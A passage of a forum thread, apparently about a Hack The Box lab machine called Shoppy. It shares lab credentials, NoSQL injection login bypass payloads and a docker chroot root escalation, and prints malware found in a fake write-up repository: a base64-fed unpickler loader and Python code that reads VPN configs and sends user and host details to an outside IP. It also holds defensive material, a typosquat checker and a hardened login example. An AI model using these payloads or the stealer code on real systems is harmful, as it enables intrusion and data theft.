Posts: 0 Threads: 0 Joined: N/A
September 18, 2022 at 12:56 PM

(September 18, 2022, 10:19 AM)technic Wrote:
(September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote:
WOW, really didn't like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with the xato wordlist to find it (is that how?)
3. the mattermost subdomain

1. This is NoSQL injection. You can check the web source code after logging in as josh.
2. The same NoSQL injection applies to search.
3. This is what I dislike most. Of all the wordlists under SecLists/Discovery/DNS/, only 2 contain this subdomain, and they are not in my frequently used wordlists for vhost enumeration.

I just wonder how you guys got the user Josh? Did you guys fuzz the search parameter?

Posts: 30 Threads: 0 Joined: N/A
September 18, 2022 at 1:38 PM

(September 17, 2022, 10:14 PM)elliotal Wrote:
(September 17, 2022, 10:12 PM)wesleyjones001 Wrote:
For those that are still stuck.
ssh [email protected] Password: Sh0ppyBest@pp!
Mattermost user josh Mattermost pass: remembermethisway Josh hash: 6ebcea65320589ca4f2f1ce039975995
mattermost is a subdomain of shoppy.

need help with root sir

(September 18, 2022, 12:56 PM)nhocit Wrote:
(September 18, 2022, 10:19 AM)technic Wrote:
(September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote:
WOW, really didn't like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with the xato wordlist to find it (is that how?)
3. the mattermost subdomain

1. This is NoSQL injection. You can check the web source code after logging in as josh.
2. The same NoSQL injection applies to search.
3. This is what I dislike most. Of all the wordlists under SecLists/Discovery/DNS/, only 2 contain this subdomain, and they are not in my frequently used wordlists for vhost enumeration.

I just wonder how you guys got the user Josh? Did you guys fuzz the search parameter?

I did. I used a list from SecLists (/Usernames/Names/names.txt) and found it this way through Burp Suite Intruder. You can also do that with wfuzz or ffuf.

I get it now and I feel dumb because once on the box I poked around mongodb; should've connected the dots on why that payload worked, wasn't SQLi but NoSQLi... Thanks for explaining.

Posts: 53 Threads: 0 Joined: N/A
September 18, 2022 at 1:39 PM

(September 18, 2022, 12:56 PM)nhocit Wrote:
(September 18, 2022, 10:19 AM)technic Wrote:
(September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote:
WOW, really didn't like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with the xato wordlist to find it (is that how?)
3. the mattermost subdomain

1. This is NoSQL injection. You can check the web source code after logging in as josh.
2. The same NoSQL injection applies to search.
3. This is what I dislike most. Of all the wordlists under SecLists/Discovery/DNS/, only 2 contain this subdomain, and they are not in my frequently used wordlists for vhost enumeration.

I just wonder how you guys got the user Josh? Did you guys fuzz the search parameter?

Put the SQL payload in the search field and you will get all users.

Posts: 5 Threads: 0 Joined: N/A
September 19, 2022 at 4:22 AM

(September 18, 2022, 07:57 AM)nhocit Wrote:
(September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote:
(September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote:
(September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote:
WOW, really didn't like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with the xato wordlist to find it (is that how?)
3. the mattermost subdomain

Not only will admin'||'1==1 bypass auth, but if entered into the search field it will also return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
(September 18, 2022, 05:42 AM)WhiteWolf9007 Wrote:
(September 18, 2022, 03:02 AM)7r4c3 Wrote:
SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then, sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
Using gtfo we have docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:

mine is showing that user jaeger is not allowed to execute this as root.

sudo -u deploy /home/deploy/password-manager
Where did you get the master password for this? And also, how did you know this command? Like, sudo -l has this access, but the recon after that?

This way:
cat /home/deploy/password-manager
You will see:
Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
Pay attention to this: "Access denied" is logged on deny. Before that, it tried to read creds.txt. So we see "Access granted" is logged on success. So 'Sample' is the master password!

ohhhk great, I thought "Sample Access" was like a demo instance of something. Thanks buddy.

Posts: 213 Threads: 0 Joined: N/A
September 19, 2022 at 8:15 AM

FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.

Posts: 2 Threads: 0 Joined: N/A
September 19, 2022 at 12:12 PM

(September 19, 2022, 08:15 AM)Exa Wrote:
FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.

Good spot. I reported this to DigitalOcean yesterday. I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it; however, I compared it to the original argparse and it does not look to do much more than send a GET out to the above-mentioned IP. I will run this in an analysis environment later today as it has caught my interest.

Posts: 213 Threads: 0 Joined: N/A
September 19, 2022 at 12:42 PM

(September 19, 2022, 12:12 PM)lyvellas Wrote:
(September 19, 2022, 08:15 AM)Exa Wrote:
FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.

Good spot. I reported this to DigitalOcean yesterday. I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it; however, I compared it to the original argparse and it does not look to do much more than send a GET out to the above-mentioned IP. I will run this in an analysis environment later today as it has caught my interest.

I'm trying to figure out whether the response from the GET request gets executed.
Regardless, I'm running into a timeout when trying to contact https://161.35.125.183. Seems like the malicious web server is not online anymore/at the moment.
There was another malicious GitHub link a few days ago (HTB Sekhmet discussion). The payload (also retrieved from a web server) sent a message to Discord titled "wall of shame".

Posts: 16 Threads: 0 Joined: N/A
September 19, 2022 at 12:53 PM

(September 19, 2022, 12:12 PM)lyvellas Wrote:
(September 19, 2022, 08:15 AM)Exa Wrote:
FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.

Good spot. I reported this to DigitalOcean yesterday. I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it; however, I compared it to the original argparse and it does not look to do much more than send a GET out to the above-mentioned IP. I will run this in an analysis environment later today as it has caught my interest.

Off-topic, but running a local diff like this:
diff /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.2/Lib/argparse.py ~/Web/Trash/arguparse-1.3/arguparse.py
shows a lot of differences. Looking at the function names that have been implemented, it loads code from the GET request to execute it locally with some kind of interpreter.

def _loads(z, /, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None):
    # Apart from base64-decoding a response body first, this is the pure-Python
    # pickle._loads from CPython's pickle.py with "pickle" renamed to "hem"
    # (so _Unhemr plays the role of pickle's _Unpickler).
    s = base64.b64decode(z.text)
    if isinstance(s, str):
        raise TypeError("Can't load hem from unicode string")
    file = io.BytesIO(s)
    return _Unhemr(file, fix_imports=fix_imports, buffers=buffers, encoding=encoding, errors=errors).load()

Something with a HEM protocol? Can't really find anything about it. Was trying to get the base64 from the URL but can't access the site anymore.

Posts: 15 Threads: 0 Joined: N/A
September 19, 2022 at 3:26 PM

(September 19, 2022, 12:42 PM)Exa Wrote:
(September 19, 2022, 12:12 PM)lyvellas Wrote:
(September 19, 2022, 08:15 AM)Exa Wrote:
FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.

Good spot. I reported this to DigitalOcean yesterday. I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it; however, I compared it to the original argparse and it does not look to do much more than send a GET out to the above-mentioned IP. I will run this in an analysis environment later today as it has caught my interest.

I'm trying to figure out whether the response from the GET request gets executed.
Regardless, I'm running into a timeout when trying to contact https://161.35.125.183. Seems like the malicious web server is not online anymore/at the moment.
There was another malicious GitHub link a few days ago (HTB Sekhmet discussion). The payload (also retrieved from a web server) sent a message to Discord titled "wall of shame".

Site is online. It serves the following Base64-encoded Python. It looks for a HackTheBox VPN config file and then extracts some information, including the username:

import platform, requests, os, glob, pwd
try:
    os.chdir('/home/')
    hackthebox = False
    # walk every .ovpn under /home and pull the subject CN out of the HTB certificate block
    for file in glob.glob('**/*.ovpn', recursive=True):
        hackthebox, htbfound = False, False
        for line in open(f'/home/{file}','r').readlines():
            if "CN=HackTheBox" in line:
                htbfound = True
            if "Subject: CN=" in line:
                if htbfound:
                    hackthebox = line.split("Subject: CN=")[1].strip()
        if hackthebox:
            break
except:
    exit
try: os_username = pwd.getpwuid(os.getuid())[0]
except: os_name = "null"
try: os_hostname = platform.node()
except: os_hostname = "null"
try: os_version = platform.release()
except: os_version = "null"
try: os_type = platform.system()
except: os_type = "null"
# host and user details are exfiltrated as request headers, with certificate checking off
try:
    requests.get('https://161.35.125.183:443/favicon.ico', headers={
        'api-token': 'a2e3bb0d292f9ef00a69df1ede854390545229fd0e32b8c5470c36744737e056',
        'htb-username': hackthebox,
        'os-username': os.getlogin(),
        'os-hostname': platform.node(),
        'os-version': platform.release(),
        'os-type': platform.system()
    }, verify=False)
except:
    exit
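The write-up repository discussed in the posts above was caught by two things a reviewer can check mechanically: a requirement whose name is one edit away from a standard-library module (arguparse for argparse), and source that assembles a network literal from string fragments, base64-decodes a response into a deserialiser, and disables TLS verification. The following is an added example, written for this thread and not taken from the malicious package, from the thread's posters, or from any project: a small static checker for exactly those patterns. The requirements text and the source it scans are constructed for the example, with the fragments and the `_loads` shape quoted from the posts; the stdlib name set, the similarity cutoff and the finding wording are assumptions.

```python
# Added example: static checks for the red flags raised in the thread above
# (typosquatted stdlib name, split IP literal, base64 -> deserialiser, verify=False).
import ast
import difflib
import re
import sys

# Standard-library top-level names; sys.stdlib_module_names exists on 3.10+ and the
# literal set keeps the check meaningful on older interpreters (assumed subset).
STDLIB = set(getattr(sys, "stdlib_module_names", ())) | {
    "argparse", "base64", "glob", "io", "json", "os", "pickle", "platform", "pwd",
}
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Constructed requirements.txt body; 'arguparse' is the name reported in the thread.
SAMPLE_REQUIREMENTS = "requests>=2.0\narguparse==1.3\n"

# Constructed source mirroring the fragments quoted in the thread; it is parsed, never run.
SAMPLE_SOURCE = '''
import base64, io, requests
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"

def _loads(z, /, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None):
    s = base64.b64decode(z.text)
    file = io.BytesIO(s)
    return _Unhemr(file, fix_imports=fix_imports, buffers=buffers, encoding=encoding, errors=errors).load()

def beacon():
    return requests.get("https://" + i + ":443/favicon.ico", verify=False)
'''


def parse_requirements(text):
    """Bare, lower-cased package names from a requirements.txt body (comments and options skipped)."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if match:
            names.append(match.group(0).lower())
    return names


def typosquat_candidates(names, cutoff=0.8):
    """(requirement, stdlib module) pairs where the name is close to, but not, a stdlib name."""
    findings = []
    for name in names:
        if name in STDLIB:
            continue
        close = difflib.get_close_matches(name, STDLIB, n=1, cutoff=cutoff)
        if close:
            findings.append((name, close[0]))
    return findings


def call_name(node):
    """Dotted name of a call target, e.g. 'base64.b64decode'; '<call>' marks a chained call."""
    func, parts = node.func, []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    elif isinstance(func, ast.Call):
        parts.append("<call>")
    return ".".join(reversed(parts))


def scan_source(src):
    """Line-ordered findings: split IPv4 literals, base64-to-deserialiser flows, verify=False."""
    tree = ast.parse(src)
    findings = []
    # Plain string assignments, so f-strings built only from them can be rendered statically.
    consts = {n.targets[0].id: n.value.value for n in ast.walk(tree)
              if isinstance(n, ast.Assign) and len(n.targets) == 1
              and isinstance(n.targets[0], ast.Name)
              and isinstance(n.value, ast.Constant) and isinstance(n.value.value, str)}
    for node in ast.walk(tree):
        if isinstance(node, ast.JoinedStr):
            rendered = ""
            for part in node.values:
                if isinstance(part, ast.Constant):
                    rendered += str(part.value)
                elif (isinstance(part, ast.FormattedValue) and isinstance(part.value, ast.Name)
                        and part.value.id in consts):
                    rendered += consts[part.value.id]
                else:
                    rendered = None
                    break
            if rendered and IPV4.match(rendered):
                findings.append((node.lineno, f"line {node.lineno}: IPv4 literal {rendered} assembled from string fragments"))
        elif isinstance(node, ast.FunctionDef):
            calls = {call_name(n) for n in ast.walk(node) if isinstance(n, ast.Call)}
            decodes = sorted(c for c in calls if c.endswith("b64decode"))
            loads = sorted(c for c in calls if c.rsplit(".", 1)[-1] in ("load", "loads"))
            if decodes and loads:
                findings.append((node.lineno, f"line {node.lineno}: {node.name}() base64-decodes data and passes it to {loads[0]}()"))
        elif isinstance(node, ast.Call):
            for kw in node.keywords:
                if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                    findings.append((node.lineno, f"line {node.lineno}: {call_name(node)}() called with verify=False"))
    return [msg for _, msg in sorted(findings)]


if __name__ == "__main__":
    for req, module in typosquat_candidates(parse_requirements(SAMPLE_REQUIREMENTS)):
        print(f"requirement {req!r} looks like stdlib module {module!r}")
    for finding in scan_source(SAMPLE_SOURCE):
        print(finding)
```

Run against the constructed inputs it reports arguparse as a near-miss for argparse, the reassembled 161.35.125.183 literal, the `_loads()` base64-to-`.load()` flow, and the `requests.get()` call with `verify=False`. The checks are deliberately syntactic: a package that renames pickle to something else, as the sample does, still trips the decode-then-load rule because only the call shape is matched, while a legitimate backport with the same name as a stdlib module is not flagged as a typosquat (it is equal to, not near, the stdlib name) and would need a separate allow-list decision.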
Posts: 21 Threads: 0 Joined: N/A
September 19, 2022 at 6:23 PM

(September 17, 2022, 08:00 PM)xurka Wrote:
(September 17, 2022, 07:53 PM)elliotal Wrote:
if you put username' in the username field, the server couldn't process it for some reason

there is an injection there that brings us in as admin: admin'||''===' then we search the same username and get all users' hashes, but the hashes are uncrackable

Hello, I was just asking how you were able to figure out that this is the appropriate payload to use.
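The payloads quoted in this thread (admin'||'1==1 and admin'||''===') only do anything when the login handler splices the submitted username straight into a MongoDB $where JavaScript expression, which is why a plain single quote made the server choke: it breaks the string literal inside that expression. The following is an added example, not Shoppy's code and not from anyone in this thread: a hypothetical vulnerable login beside a hardened one, run against a constructed in-memory user list, with `new Function` standing in for how MongoDB evaluates $where once per document. The field names, the users array and all helper names are assumptions.

```javascript
// Added example (not Shoppy's code): string-built $where clause vs. an equality
// filter with type checks. Collection, fields and helpers are constructed.

// Constructed in-memory stand-in for a MongoDB users collection.
const users = [
  { username: 'admin', password: 'hash-of-admin-password', role: 'admin' },
  { username: 'josh', password: 'hash-of-josh-password', role: 'user' },
];

// Vulnerable pattern (hypothetical): raw request fields are spliced into a
// JavaScript expression that MongoDB would evaluate via $where.
function buildWhereClause(username, password) {
  return `this.username == '${username}' && this.password == '${password}'`;
}

// Stand-in for $where evaluation: MongoDB compiles the string and runs it once
// per document with `this` bound to that document; new Function does the same here.
function runWhere(clause, docs) {
  const predicate = new Function(`return (${clause});`);
  return docs.filter((doc) => predicate.call(doc));
}

function vulnerableLogin(username, password) {
  const matches = runWhere(buildWhereClause(username, password), users);
  return matches.length > 0 ? matches[0] : null;
}

// Hardened pattern: match fields by equality and refuse anything that is not a
// plain string, so neither a quote-breaking string nor an operator object such
// as { $ne: '' } (which a driver would pass through as a query operator) can
// change the query's meaning. A real app would compare a slow password hash
// here rather than use equality; the stored value is a stand-in.
function safeLogin(username, password) {
  if (typeof username !== 'string' || typeof password !== 'string') {
    return null;
  }
  const match = users.find(
    (doc) => doc.username === username && doc.password === password,
  );
  return match || null;
}

// Show the difference on the payload quoted in the thread: the quote closes the
// username literal and the remainder becomes part of the JavaScript expression.
const payload = "admin'||''==='";
console.log('vulnerable:', vulnerableLogin(payload, 'not-the-password'));
console.log('hardened:  ', safeLogin(payload, 'not-the-password'));
```

With the payload, the vulnerable clause becomes `this.username == 'admin'||''==='' && this.password == 'not-the-password'`, and JavaScript precedence (`&&` binds tighter than `||`) turns it into `(username is admin) || (true && false)`, which is true for the admin document regardless of the password. The hardened version never builds an expression, so the same input is simply a username that does not exist.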